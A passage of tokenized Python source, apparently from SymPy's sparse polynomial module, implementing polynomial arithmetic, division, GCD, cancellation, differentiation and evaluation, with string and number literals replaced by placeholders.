( ) : <EOL> p [ zm ] = cp2 <EOL> else : <EOL> if p2 == - p [ zm ] : <EOL> del p [ zm ] <EOL> else : <EOL> p [ zm ] += cp2 <EOL> return p <EOL> def __radd__ ( p1 , n ) : <EOL> p = p1 . copy ( ) <EOL> if not n : <EOL> return p <EOL> ring = p1 . ring <EOL> try : <EOL> n = ring . domain_new ( n ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> zm = ring . zero_monom <EOL> if zm not in p1 . keys ( ) : <EOL> p [ zm ] = n <EOL> else : <EOL> if n == - p [ zm ] : <EOL> del p [ zm ] <EOL> else : <EOL> p [ zm ] += n <EOL> return p <EOL> def __sub__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> if not p2 : <EOL> return p1 . 
copy ( ) <EOL> ring = p1 . ring <EOL> if isinstance ( p2 , ring . dtype ) : <EOL> p = p1 . copy ( ) <EOL> get = p . get <EOL> zero = ring . domain . zero <EOL> for k , v in p2 . items ( ) : <EOL> v = get ( k , zero ) - v <EOL> if v : <EOL> p [ k ] = v <EOL> else : <EOL> del p [ k ] <EOL> return p <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rsub__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> p = p1 . copy ( ) <EOL> zm = ring . zero_monom <EOL> if zm not in p1 . keys ( ) : <EOL> p [ zm ] = - p2 <EOL> else : <EOL> if p2 == p [ zm ] : <EOL> del p [ zm ] <EOL> else : <EOL> p [ zm ] -= p2 <EOL> return p <EOL> def __rsub__ ( p1 , n ) : <EOL> """<STR_LIT>""" <EOL> ring = p1 . ring <EOL> try : <EOL> n = ring . domain_new ( n ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> p = ring . zero <EOL> for expv in p1 : <EOL> p [ expv ] = - p1 [ expv ] <EOL> p += n <EOL> return p <EOL> def __mul__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p1 or not p2 : <EOL> return p <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> get = p . get <EOL> zero = ring . domain . zero <EOL> monomial_mul = ring . monomial_mul <EOL> p2it = list ( p2 . items ( ) ) <EOL> for exp1 , v1 in p1 . items ( ) : <EOL> for exp2 , v2 in p2it : <EOL> exp = monomial_mul ( exp1 , exp2 ) <EOL> p [ exp ] = get ( exp , zero ) + v1 * v2 <EOL> p . strip_zero ( ) <EOL> return p <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . 
domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rmul__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> for exp1 , v1 in p1 . items ( ) : <EOL> v = v1 * p2 <EOL> if v : <EOL> p [ exp1 ] = v <EOL> return p <EOL> def __rmul__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> p = p1 . ring . zero <EOL> if not p2 : <EOL> return p <EOL> try : <EOL> p2 = p . ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> for exp1 , v1 in p1 . items ( ) : <EOL> v = p2 * v1 <EOL> if v : <EOL> p [ exp1 ] = v <EOL> return p <EOL> def __pow__ ( self , n ) : <EOL> """<STR_LIT>""" <EOL> ring = self . ring <EOL> if not n : <EOL> if self : <EOL> return ring . one <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif len ( self ) == <NUM_LIT:1> : <EOL> monom , coeff = list ( self . items ( ) ) [ <NUM_LIT:0> ] <EOL> p = ring . zero <EOL> if coeff == <NUM_LIT:1> : <EOL> p [ ring . monomial_pow ( monom , n ) ] = coeff <EOL> else : <EOL> p [ ring . monomial_pow ( monom , n ) ] = coeff ** n <EOL> return p <EOL> n = int ( n ) <EOL> if n < <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif n == <NUM_LIT:1> : <EOL> return self . copy ( ) <EOL> elif n == <NUM_LIT:2> : <EOL> return self . square ( ) <EOL> elif n == <NUM_LIT:3> : <EOL> return self * self . square ( ) <EOL> elif len ( self ) <= <NUM_LIT:5> : <EOL> return self . _pow_multinomial ( n ) <EOL> else : <EOL> return self . _pow_generic ( n ) <EOL> def _pow_generic ( self , n ) : <EOL> p = self . ring . one <EOL> c = self <EOL> while True : <EOL> if n & <NUM_LIT:1> : <EOL> p = p * c <EOL> n -= <NUM_LIT:1> <EOL> if not n : <EOL> break <EOL> c = c . square ( ) <EOL> n = n // <NUM_LIT:2> <EOL> return p <EOL> def _pow_multinomial ( self , n ) : <EOL> multinomials = list ( multinomial_coefficients ( len ( self ) , n ) . 
items ( ) ) <EOL> monomial_mulpow = self . ring . monomial_mulpow <EOL> zero_monom = self . ring . zero_monom <EOL> terms = list ( self . iterterms ( ) ) <EOL> zero = self . ring . domain . zero <EOL> poly = self . ring . zero <EOL> for multinomial , multinomial_coeff in multinomials : <EOL> product_monom = zero_monom <EOL> product_coeff = multinomial_coeff <EOL> for exp , ( monom , coeff ) in zip ( multinomial , terms ) : <EOL> if exp : <EOL> product_monom = monomial_mulpow ( product_monom , monom , exp ) <EOL> product_coeff *= coeff ** exp <EOL> monom = tuple ( product_monom ) <EOL> coeff = product_coeff <EOL> coeff = poly . get ( monom , zero ) + coeff <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> else : <EOL> del poly [ monom ] <EOL> return poly <EOL> def square ( self ) : <EOL> """<STR_LIT>""" <EOL> ring = self . ring <EOL> p = ring . zero <EOL> get = p . get <EOL> keys = list ( self . keys ( ) ) <EOL> zero = ring . domain . zero <EOL> monomial_mul = ring . monomial_mul <EOL> for i in range ( len ( keys ) ) : <EOL> k1 = keys [ i ] <EOL> pk = self [ k1 ] <EOL> for j in range ( i ) : <EOL> k2 = keys [ j ] <EOL> exp = monomial_mul ( k1 , k2 ) <EOL> p [ exp ] = get ( exp , zero ) + pk * self [ k2 ] <EOL> p = p . imul_num ( <NUM_LIT:2> ) <EOL> get = p . get <EOL> for k , v in self . items ( ) : <EOL> k2 = monomial_mul ( k , k ) <EOL> p [ k2 ] = get ( k2 , zero ) + v ** <NUM_LIT:2> <EOL> p . strip_zero ( ) <EOL> return p <EOL> def __divmod__ ( p1 , p2 ) : <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p2 : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> return p1 . div ( p2 ) <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . 
__rdivmod__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> return ( p1 . quo_ground ( p2 ) , p1 . rem_ground ( p2 ) ) <EOL> def __rdivmod__ ( p1 , p2 ) : <EOL> return NotImplemented <EOL> def __mod__ ( p1 , p2 ) : <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p2 : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> return p1 . rem ( p2 ) <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rmod__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> return p1 . rem_ground ( p2 ) <EOL> def __rmod__ ( p1 , p2 ) : <EOL> return NotImplemented <EOL> def __truediv__ ( p1 , p2 ) : <EOL> ring = p1 . ring <EOL> p = ring . zero <EOL> if not p2 : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif isinstance ( p2 , ring . dtype ) : <EOL> if p2 . is_monomial : <EOL> return p1 * ( p2 ** ( - <NUM_LIT:1> ) ) <EOL> else : <EOL> return p1 . quo ( p2 ) <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __rtruediv__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> p2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> return p1 . 
quo_ground ( p2 ) <EOL> def __rtruediv__ ( p1 , p2 ) : <EOL> return NotImplemented <EOL> __floordiv__ = __div__ = __truediv__ <EOL> __rfloordiv__ = __rdiv__ = __rtruediv__ <EOL> def _term_div ( self ) : <EOL> zm = self . ring . zero_monom <EOL> domain = self . ring . domain <EOL> domain_quo = domain . quo <EOL> monomial_div = self . ring . monomial_div <EOL> if domain . has_Field : <EOL> def term_div ( a_lm_a_lc , b_lm_b_lc ) : <EOL> a_lm , a_lc = a_lm_a_lc <EOL> b_lm , b_lc = b_lm_b_lc <EOL> if b_lm == zm : <EOL> monom = a_lm <EOL> else : <EOL> monom = monomial_div ( a_lm , b_lm ) <EOL> if monom is not None : <EOL> return monom , domain_quo ( a_lc , b_lc ) <EOL> else : <EOL> return None <EOL> else : <EOL> def term_div ( a_lm_a_lc , b_lm_b_lc ) : <EOL> a_lm , a_lc = a_lm_a_lc <EOL> b_lm , b_lc = b_lm_b_lc <EOL> if b_lm == zm : <EOL> monom = a_lm <EOL> else : <EOL> monom = monomial_div ( a_lm , b_lm ) <EOL> if not ( monom is None or a_lc % b_lc ) : <EOL> return monom , domain_quo ( a_lc , b_lc ) <EOL> else : <EOL> return None <EOL> return term_div <EOL> def div ( self , fv ) : <EOL> """<STR_LIT>""" <EOL> ring = self . ring <EOL> domain = ring . domain <EOL> ret_single = False <EOL> if isinstance ( fv , PolyElement ) : <EOL> ret_single = True <EOL> fv = [ fv ] <EOL> if any ( not f for f in fv ) : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> if not self : <EOL> if ret_single : <EOL> return ring . zero , ring . zero <EOL> else : <EOL> return [ ] , ring . zero <EOL> for f in fv : <EOL> if f . ring != ring : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> s = len ( fv ) <EOL> qv = [ ring . zero for i in range ( s ) ] <EOL> p = self . copy ( ) <EOL> r = ring . zero <EOL> term_div = self . _term_div ( ) <EOL> expvs = [ fx . leading_expv ( ) for fx in fv ] <EOL> while p : <EOL> i = <NUM_LIT:0> <EOL> divoccurred = <NUM_LIT:0> <EOL> while i < s and divoccurred == <NUM_LIT:0> : <EOL> expv = p . 
leading_expv ( ) <EOL> term = term_div ( ( expv , p [ expv ] ) , ( expvs [ i ] , fv [ i ] [ expvs [ i ] ] ) ) <EOL> if term is not None : <EOL> expv1 , c = term <EOL> qv [ i ] = qv [ i ] . _iadd_monom ( ( expv1 , c ) ) <EOL> p = p . _iadd_poly_monom ( fv [ i ] , ( expv1 , - c ) ) <EOL> divoccurred = <NUM_LIT:1> <EOL> else : <EOL> i += <NUM_LIT:1> <EOL> if not divoccurred : <EOL> expv = p . leading_expv ( ) <EOL> r = r . _iadd_monom ( ( expv , p [ expv ] ) ) <EOL> del p [ expv ] <EOL> if expv == ring . zero_monom : <EOL> r += p <EOL> if ret_single : <EOL> if not qv : <EOL> return ring . zero , r <EOL> else : <EOL> return qv [ <NUM_LIT:0> ] , r <EOL> else : <EOL> return qv , r <EOL> def rem ( self , G ) : <EOL> f = self <EOL> if isinstance ( G , PolyElement ) : <EOL> G = [ G ] <EOL> if any ( not g for g in G ) : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> ring = f . ring <EOL> domain = ring . domain <EOL> order = ring . order <EOL> zero = domain . zero <EOL> monomial_mul = ring . monomial_mul <EOL> r = ring . zero <EOL> term_div = f . _term_div ( ) <EOL> ltf = f . LT <EOL> f = f . copy ( ) <EOL> get = f . get <EOL> while f : <EOL> for g in G : <EOL> tq = term_div ( ltf , g . LT ) <EOL> if tq is not None : <EOL> m , c = tq <EOL> for mg , cg in g . iterterms ( ) : <EOL> m1 = monomial_mul ( mg , m ) <EOL> c1 = get ( m1 , zero ) - c * cg <EOL> if not c1 : <EOL> del f [ m1 ] <EOL> else : <EOL> f [ m1 ] = c1 <EOL> ltm = f . leading_expv ( ) <EOL> if ltm is not None : <EOL> ltf = ltm , f [ ltm ] <EOL> break <EOL> else : <EOL> ltm , ltc = ltf <EOL> if ltm in r : <EOL> r [ ltm ] += ltc <EOL> else : <EOL> r [ ltm ] = ltc <EOL> del f [ ltm ] <EOL> ltm = f . leading_expv ( ) <EOL> if ltm is not None : <EOL> ltf = ltm , f [ ltm ] <EOL> return r <EOL> def quo ( f , G ) : <EOL> return f . div ( G ) [ <NUM_LIT:0> ] <EOL> def exquo ( f , G ) : <EOL> q , r = f . 
div ( G ) <EOL> if not r : <EOL> return q <EOL> else : <EOL> raise ExactQuotientFailed ( f , G ) <EOL> def _iadd_monom ( self , mc ) : <EOL> """<STR_LIT>""" <EOL> if self in self . ring . _gens_set : <EOL> cpself = self . copy ( ) <EOL> else : <EOL> cpself = self <EOL> expv , coeff = mc <EOL> c = cpself . get ( expv ) <EOL> if c is None : <EOL> cpself [ expv ] = coeff <EOL> else : <EOL> c += coeff <EOL> if c : <EOL> cpself [ expv ] = c <EOL> else : <EOL> del cpself [ expv ] <EOL> return cpself <EOL> def _iadd_poly_monom ( self , p2 , mc ) : <EOL> """<STR_LIT>""" <EOL> p1 = self <EOL> if p1 in p1 . ring . _gens_set : <EOL> p1 = p1 . copy ( ) <EOL> ( m , c ) = mc <EOL> get = p1 . get <EOL> zero = p1 . ring . domain . zero <EOL> monomial_mul = p1 . ring . monomial_mul <EOL> for k , v in p2 . items ( ) : <EOL> ka = monomial_mul ( k , m ) <EOL> coeff = get ( ka , zero ) + v * c <EOL> if coeff : <EOL> p1 [ ka ] = coeff <EOL> else : <EOL> del p1 [ ka ] <EOL> return p1 <EOL> def degree ( f , x = None ) : <EOL> """<STR_LIT>""" <EOL> i = f . ring . index ( x ) <EOL> if not f : <EOL> return - oo <EOL> else : <EOL> return max ( [ monom [ i ] for monom in f . itermonoms ( ) ] ) <EOL> def degrees ( f ) : <EOL> """<STR_LIT>""" <EOL> if not f : <EOL> return ( - oo , ) * f . ring . ngens <EOL> else : <EOL> return tuple ( map ( max , list ( zip ( * f . itermonoms ( ) ) ) ) ) <EOL> def tail_degree ( f , x = None ) : <EOL> """<STR_LIT>""" <EOL> i = f . ring . index ( x ) <EOL> if not f : <EOL> return - oo <EOL> else : <EOL> return min ( [ monom [ i ] for monom in f . itermonoms ( ) ] ) <EOL> def tail_degrees ( f ) : <EOL> """<STR_LIT>""" <EOL> if not f : <EOL> return ( - oo , ) * f . ring . ngens <EOL> else : <EOL> return tuple ( map ( min , list ( zip ( * f . itermonoms ( ) ) ) ) ) <EOL> def leading_expv ( self ) : <EOL> """<STR_LIT>""" <EOL> if self : <EOL> return self . ring . 
leading_expv ( self ) <EOL> else : <EOL> return None <EOL> def _get_coeff ( self , expv ) : <EOL> return self . get ( expv , self . ring . domain . zero ) <EOL> def coeff ( self , element ) : <EOL> """<STR_LIT>""" <EOL> if element == <NUM_LIT:1> : <EOL> return self . _get_coeff ( self . ring . zero_monom ) <EOL> elif isinstance ( element , self . ring . dtype ) : <EOL> terms = list ( element . iterterms ( ) ) <EOL> if len ( terms ) == <NUM_LIT:1> : <EOL> monom , coeff = terms [ <NUM_LIT:0> ] <EOL> if coeff == self . ring . domain . one : <EOL> return self . _get_coeff ( monom ) <EOL> raise ValueError ( "<STR_LIT>" % element ) <EOL> def const ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _get_coeff ( self . ring . zero_monom ) <EOL> @ property <EOL> def LC ( self ) : <EOL> return self . _get_coeff ( self . leading_expv ( ) ) <EOL> @ property <EOL> def LM ( self ) : <EOL> expv = self . leading_expv ( ) <EOL> if expv is None : <EOL> return self . ring . zero_monom <EOL> else : <EOL> return expv <EOL> def leading_monom ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . ring . zero <EOL> expv = self . leading_expv ( ) <EOL> if expv : <EOL> p [ expv ] = self . ring . domain . one <EOL> return p <EOL> @ property <EOL> def LT ( self ) : <EOL> expv = self . leading_expv ( ) <EOL> if expv is None : <EOL> return ( self . ring . zero_monom , self . ring . domain . zero ) <EOL> else : <EOL> return ( expv , self . _get_coeff ( expv ) ) <EOL> def leading_term ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . ring . zero <EOL> expv = self . leading_expv ( ) <EOL> if expv : <EOL> p [ expv ] = self [ expv ] <EOL> return p <EOL> def _sorted ( self , seq , order ) : <EOL> if order is None : <EOL> order = self . ring . order <EOL> else : <EOL> order = OrderOpt . 
preprocess ( order ) <EOL> if order is lex : <EOL> return sorted ( seq , key = lambda monom : monom [ <NUM_LIT:0> ] , reverse = True ) <EOL> else : <EOL> return sorted ( seq , key = lambda monom : order ( monom [ <NUM_LIT:0> ] ) , reverse = True ) <EOL> def coeffs ( self , order = None ) : <EOL> """<STR_LIT>""" <EOL> return [ coeff for _ , coeff in self . terms ( order ) ] <EOL> def monoms ( self , order = None ) : <EOL> """<STR_LIT>""" <EOL> return [ monom for monom , _ in self . terms ( order ) ] <EOL> def terms ( self , order = None ) : <EOL> """<STR_LIT>""" <EOL> return self . _sorted ( list ( self . items ( ) ) , order ) <EOL> def itercoeffs ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . values ( ) ) <EOL> def itermonoms ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . keys ( ) ) <EOL> def iterterms ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . items ( ) ) <EOL> def listcoeffs ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . values ( ) ) <EOL> def listmonoms ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . keys ( ) ) <EOL> def listterms ( self ) : <EOL> """<STR_LIT>""" <EOL> return list ( self . items ( ) ) <EOL> def imul_num ( p , c ) : <EOL> """<STR_LIT>""" <EOL> if p in p . ring . _gens_set : <EOL> return p * c <EOL> if not c : <EOL> p . clear ( ) <EOL> return <EOL> for exp in p : <EOL> p [ exp ] *= c <EOL> return p <EOL> def content ( f ) : <EOL> """<STR_LIT>""" <EOL> domain = f . ring . domain <EOL> cont = domain . zero <EOL> gcd = domain . gcd <EOL> for coeff in f . itercoeffs ( ) : <EOL> cont = gcd ( cont , coeff ) <EOL> return cont <EOL> def primitive ( f ) : <EOL> """<STR_LIT>""" <EOL> cont = f . content ( ) <EOL> return cont , f . quo_ground ( cont ) <EOL> def monic ( f ) : <EOL> """<STR_LIT>""" <EOL> if not f : <EOL> return f <EOL> else : <EOL> return f . quo_ground ( f . LC ) <EOL> def mul_ground ( f , x ) : <EOL> if not x : <EOL> return f . ring . 
zero <EOL> terms = [ ( monom , coeff * x ) for monom , coeff in f . iterterms ( ) ] <EOL> return f . new ( terms ) <EOL> def mul_monom ( f , monom ) : <EOL> monomial_mul = f . ring . monomial_mul <EOL> terms = [ ( monomial_mul ( f_monom , monom ) , f_coeff ) for f_monom , f_coeff in f . items ( ) ] <EOL> return f . new ( terms ) <EOL> def mul_term ( f , term ) : <EOL> monom , coeff = term <EOL> if not f or not coeff : <EOL> return f . ring . zero <EOL> elif monom == f . ring . zero_monom : <EOL> return f . mul_ground ( coeff ) <EOL> monomial_mul = f . ring . monomial_mul <EOL> terms = [ ( monomial_mul ( f_monom , monom ) , f_coeff * coeff ) for f_monom , f_coeff in f . items ( ) ] <EOL> return f . new ( terms ) <EOL> def quo_ground ( f , x ) : <EOL> domain = f . ring . domain <EOL> if not x : <EOL> raise ZeroDivisionError ( '<STR_LIT>' ) <EOL> if not f or x == domain . one : <EOL> return f <EOL> if domain . has_Field : <EOL> quo = domain . quo <EOL> terms = [ ( monom , quo ( coeff , x ) ) for monom , coeff in f . iterterms ( ) ] <EOL> else : <EOL> terms = [ ( monom , coeff // x ) for monom , coeff in f . iterterms ( ) if not ( coeff % x ) ] <EOL> return f . new ( terms ) <EOL> def quo_term ( f , term ) : <EOL> monom , coeff = term <EOL> if not coeff : <EOL> raise ZeroDivisionError ( "<STR_LIT>" ) <EOL> elif not f : <EOL> return f . ring . zero <EOL> elif monom == f . ring . zero_monom : <EOL> return f . quo_ground ( coeff ) <EOL> term_div = f . _term_div ( ) <EOL> terms = [ term_div ( t , term ) for t in f . iterterms ( ) ] <EOL> return f . new ( [ t for t in terms if t is not None ] ) <EOL> def trunc_ground ( f , p ) : <EOL> if f . ring . domain . is_ZZ : <EOL> terms = [ ] <EOL> for monom , coeff in f . iterterms ( ) : <EOL> coeff = coeff % p <EOL> if coeff > p // <NUM_LIT:2> : <EOL> coeff = coeff - p <EOL> terms . append ( ( monom , coeff ) ) <EOL> else : <EOL> terms = [ ( monom , coeff % p ) for monom , coeff in f . iterterms ( ) ] <EOL> poly = f . 
new ( terms ) <EOL> poly . strip_zero ( ) <EOL> return poly <EOL> rem_ground = trunc_ground <EOL> def extract_ground ( self , g ) : <EOL> f = self <EOL> fc = f . content ( ) <EOL> gc = g . content ( ) <EOL> gcd = f . ring . domain . gcd ( fc , gc ) <EOL> f = f . quo_ground ( gcd ) <EOL> g = g . quo_ground ( gcd ) <EOL> return gcd , f , g <EOL> def _norm ( f , norm_func ) : <EOL> if not f : <EOL> return f . ring . domain . zero <EOL> else : <EOL> ground_abs = f . ring . domain . abs <EOL> return norm_func ( [ ground_abs ( coeff ) for coeff in f . itercoeffs ( ) ] ) <EOL> def max_norm ( f ) : <EOL> return f . _norm ( max ) <EOL> def l1_norm ( f ) : <EOL> return f . _norm ( sum ) <EOL> def deflate ( f , * G ) : <EOL> ring = f . ring <EOL> polys = [ f ] + list ( G ) <EOL> J = [ <NUM_LIT:0> ] * ring . ngens <EOL> for p in polys : <EOL> for monom in p . itermonoms ( ) : <EOL> for i , m in enumerate ( monom ) : <EOL> J [ i ] = igcd ( J [ i ] , m ) <EOL> for i , b in enumerate ( J ) : <EOL> if not b : <EOL> J [ i ] = <NUM_LIT:1> <EOL> J = tuple ( J ) <EOL> if all ( b == <NUM_LIT:1> for b in J ) : <EOL> return J , polys <EOL> H = [ ] <EOL> for p in polys : <EOL> h = ring . zero <EOL> for I , coeff in p . iterterms ( ) : <EOL> N = [ i // j for i , j in zip ( I , J ) ] <EOL> h [ tuple ( N ) ] = coeff <EOL> H . append ( h ) <EOL> return J , H <EOL> def inflate ( f , J ) : <EOL> poly = f . ring . zero <EOL> for I , coeff in f . iterterms ( ) : <EOL> N = [ i * j for i , j in zip ( I , J ) ] <EOL> poly [ tuple ( N ) ] = coeff <EOL> return poly <EOL> def lcm ( self , g ) : <EOL> f = self <EOL> domain = f . ring . domain <EOL> if not domain . has_Field : <EOL> fc , f = f . primitive ( ) <EOL> gc , g = g . primitive ( ) <EOL> c = domain . lcm ( fc , gc ) <EOL> h = ( f * g ) . quo ( f . gcd ( g ) ) <EOL> if not domain . has_Field : <EOL> return h . mul_ground ( c ) <EOL> else : <EOL> return h . monic ( ) <EOL> def gcd ( f , g ) : <EOL> return f . 
cofactors ( g ) [ <NUM_LIT:0> ] <EOL> def cofactors ( f , g ) : <EOL> if not f and not g : <EOL> zero = f . ring . zero <EOL> return zero , zero , zero <EOL> elif not f : <EOL> h , cff , cfg = f . _gcd_zero ( g ) <EOL> return h , cff , cfg <EOL> elif not g : <EOL> h , cfg , cff = g . _gcd_zero ( f ) <EOL> return h , cff , cfg <EOL> elif len ( f ) == <NUM_LIT:1> : <EOL> h , cff , cfg = f . _gcd_monom ( g ) <EOL> return h , cff , cfg <EOL> elif len ( g ) == <NUM_LIT:1> : <EOL> h , cfg , cff = g . _gcd_monom ( f ) <EOL> return h , cff , cfg <EOL> J , ( f , g ) = f . deflate ( g ) <EOL> h , cff , cfg = f . _gcd ( g ) <EOL> return ( h . inflate ( J ) , cff . inflate ( J ) , cfg . inflate ( J ) ) <EOL> def _gcd_zero ( f , g ) : <EOL> one , zero = f . ring . one , f . ring . zero <EOL> if g . is_nonnegative : <EOL> return g , zero , one <EOL> else : <EOL> return - g , zero , - one <EOL> def _gcd_monom ( f , g ) : <EOL> ring = f . ring <EOL> ground_gcd = ring . domain . gcd <EOL> ground_quo = ring . domain . quo <EOL> monomial_gcd = ring . monomial_gcd <EOL> monomial_ldiv = ring . monomial_ldiv <EOL> mf , cf = list ( f . iterterms ( ) ) [ <NUM_LIT:0> ] <EOL> _mgcd , _cgcd = mf , cf <EOL> for mg , cg in g . iterterms ( ) : <EOL> _mgcd = monomial_gcd ( _mgcd , mg ) <EOL> _cgcd = ground_gcd ( _cgcd , cg ) <EOL> h = f . new ( [ ( _mgcd , _cgcd ) ] ) <EOL> cff = f . new ( [ ( monomial_ldiv ( mf , _mgcd ) , ground_quo ( cf , _cgcd ) ) ] ) <EOL> cfg = f . new ( [ ( monomial_ldiv ( mg , _mgcd ) , ground_quo ( cg , _cgcd ) ) for mg , cg in g . iterterms ( ) ] ) <EOL> return h , cff , cfg <EOL> def _gcd ( f , g ) : <EOL> ring = f . ring <EOL> if ring . domain . is_QQ : <EOL> return f . _gcd_QQ ( g ) <EOL> elif ring . domain . is_ZZ : <EOL> return f . _gcd_ZZ ( g ) <EOL> else : <EOL> return ring . dmp_inner_gcd ( f , g ) <EOL> def _gcd_ZZ ( f , g ) : <EOL> return heugcd ( f , g ) <EOL> def _gcd_QQ ( self , g ) : <EOL> f = self <EOL> ring = f . ring <EOL> new_ring = ring . 
clone ( domain = ring . domain . get_ring ( ) ) <EOL> cf , f = f . clear_denoms ( ) <EOL> cg , g = g . clear_denoms ( ) <EOL> f = f . set_ring ( new_ring ) <EOL> g = g . set_ring ( new_ring ) <EOL> h , cff , cfg = f . _gcd_ZZ ( g ) <EOL> h = h . set_ring ( ring ) <EOL> c , h = h . LC , h . monic ( ) <EOL> cff = cff . set_ring ( ring ) . mul_ground ( ring . domain . quo ( c , cf ) ) <EOL> cfg = cfg . set_ring ( ring ) . mul_ground ( ring . domain . quo ( c , cg ) ) <EOL> return h , cff , cfg <EOL> def cancel ( self , g ) : <EOL> """<STR_LIT>""" <EOL> f = self <EOL> ring = f . ring <EOL> if not f : <EOL> return f , ring . one <EOL> domain = ring . domain <EOL> if not ( domain . has_Field and domain . has_assoc_Ring ) : <EOL> _ , p , q = f . cofactors ( g ) <EOL> if q . is_negative : <EOL> p , q = - p , - q <EOL> else : <EOL> new_ring = ring . clone ( domain = domain . get_ring ( ) ) <EOL> cq , f = f . clear_denoms ( ) <EOL> cp , g = g . clear_denoms ( ) <EOL> f = f . set_ring ( new_ring ) <EOL> g = g . set_ring ( new_ring ) <EOL> _ , p , q = f . cofactors ( g ) <EOL> _ , cp , cq = new_ring . domain . cofactors ( cp , cq ) <EOL> p = p . set_ring ( ring ) <EOL> q = q . set_ring ( ring ) <EOL> p_neg = p . is_negative <EOL> q_neg = q . is_negative <EOL> if p_neg and q_neg : <EOL> p , q = - p , - q <EOL> elif p_neg : <EOL> cp , p = - cp , - p <EOL> elif q_neg : <EOL> cp , q = - cp , - q <EOL> p = p . mul_ground ( cp ) <EOL> q = q . mul_ground ( cq ) <EOL> return p , q <EOL> def diff ( f , x ) : <EOL> """<STR_LIT>""" <EOL> ring = f . ring <EOL> i = ring . index ( x ) <EOL> m = ring . monomial_basis ( i ) <EOL> g = ring . zero <EOL> for expv , coeff in f . iterterms ( ) : <EOL> if expv [ i ] : <EOL> e = ring . monomial_ldiv ( expv , m ) <EOL> g [ e ] = coeff * expv [ i ] <EOL> return g <EOL> def __call__ ( f , * values ) : <EOL> if <NUM_LIT:0> < len ( values ) <= f . ring . ngens : <EOL> return f . evaluate ( list ( zip ( f . ring . 
gens , values ) ) ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( f . ring . ngens , len ( values ) ) ) <EOL> def evaluate ( self , x , a = None ) : <EOL> f = self <EOL> if isinstance ( x , list ) and a is None : <EOL> ( X , a ) , x = x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> : ] <EOL> f = f . evaluate ( X , a ) <EOL> if not x : <EOL> return f <EOL> else : <EOL> x = [ ( Y . drop ( X ) , a ) for ( Y , a ) in x ] <EOL> return f . evaluate ( x ) <EOL> ring = f . ring <EOL> i = ring . index ( x ) <EOL> a = ring . domain . convert ( a ) <EOL> if ring . ngens == <NUM_LIT:1> : <EOL> result = ring . domain . zero <EOL> for ( n , ) , coeff in f . iterterms ( ) : <EOL> result += coeff * a ** n <EOL> return result <EOL> else : <EOL> poly = ring . drop ( x ) . zero <EOL> for monom , coeff in f . iterterms ( ) : <EOL> n , monom = monom [ i ] , monom [ : i ] + 